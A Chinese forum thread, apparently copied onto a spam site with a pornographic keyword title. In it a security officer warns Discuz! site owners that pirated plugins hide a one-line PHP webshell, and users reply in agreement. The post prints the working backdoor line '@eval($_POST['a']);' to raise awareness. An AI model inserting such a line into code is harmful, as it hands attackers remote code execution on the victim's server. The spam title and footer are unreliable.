久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區(qū)

標(biāo)題: 某盜版插件中驚現(xiàn)一句話木馬，小到讓你根本無法發(fā)現(xiàn) [打印本頁]

作者: 安全專員 時(shí)間: 2019-7-17 09:28
標(biāo)題: 某盜版插件中驚現(xiàn)一句話木馬，小到讓你根本無法發(fā)現(xiàn)
本帖最后由安全專員于 2019-7-17 09:29 編輯

傳送門：安全小知識：為什么使用盜版插件容易被掛馬！

@eval($_POST['a']);

復(fù)制代碼

如上面所示，就這么短短的幾個字符，隱藏在盜版插件正常代碼之中，如果不細(xì)心的話，根本無法發(fā)現(xiàn)。
不懂php的人，可能會懷疑，這么短的一個代碼，就是木馬？
eval就是把普通的字符串當(dāng)做php代碼來執(zhí)行，像上面這個代碼就是執(zhí)行接收到的POST數(shù)據(jù)，利用這段代碼，黑客就可以向你的服務(wù)器執(zhí)行代碼了。
抓緊時(shí)間卸載盜版插件吧，盜版插件的安全問題已經(jīng)不能忽視了！

傳送門：安全小知識：為什么使用盜版插件容易被掛馬！

作者: TardisTeam 時(shí)間: 2019-7-17 10:34
本帖最后由 TardisTeam 于 2019-7-19 11:31 編輯

前排支持，拒絕盜版
如果你只要用了一次盜版插件，一句后門代碼，就可以讓整個網(wǎng)站作廢

有些攻擊者不是只劫持首頁到非法網(wǎng)站上那么簡單，有的時(shí)候還會用“間諜式”寫入更多潛在后門入口文件，而且命名法會偽裝成正常文件名稱，代碼可能還是加密，以免被檢測，這樣就可以留著以后再進(jìn)行攻擊，即使你這時(shí)候把盜版插件刪除，也是無濟(jì)于事，還是一樣會被攻擊，除非你把所有新植入的后門文件也都刪除了，否則針對一般站長而言，想要安全，就不得不重裝網(wǎng)站了

如果等發(fā)生以上情況再付費(fèi)找人清理后門文件和維護(hù)，不但服務(wù)費(fèi)成本高，也可能沒法根除到底，對于如果用心經(jīng)營網(wǎng)站的站長，千萬不要選擇盜版插件，也不要隨意授權(quán)網(wǎng)站關(guān)鍵信息資源給第三方，如服務(wù)器，F(xiàn)TP等，做好及時(shí)性備份，拒絕使用盜版插件或模版

作者: 大旗網(wǎng) 時(shí)間: 2019-7-17 16:10
堅(jiān)決不用盜版

作者: TG123999 時(shí)間: 2019-7-17 17:12

蘋果發(fā)表于 2019-7-17 10:39
不能用盜版

萬一有個木馬全站就廢了

說的對，支持正版

作者: lovetvb 時(shí)間: 2023-3-29 14:01
哦哦明白了

作者: tuhemm 時(shí)間: 2023-3-29 23:32
提示: 作者被禁止或刪除內(nèi)容自動屏蔽

歡迎光臨 Discuz! 官方交流社區(qū) (http://www.9999xn.com/)

^{<samp id="64si8"></samp>}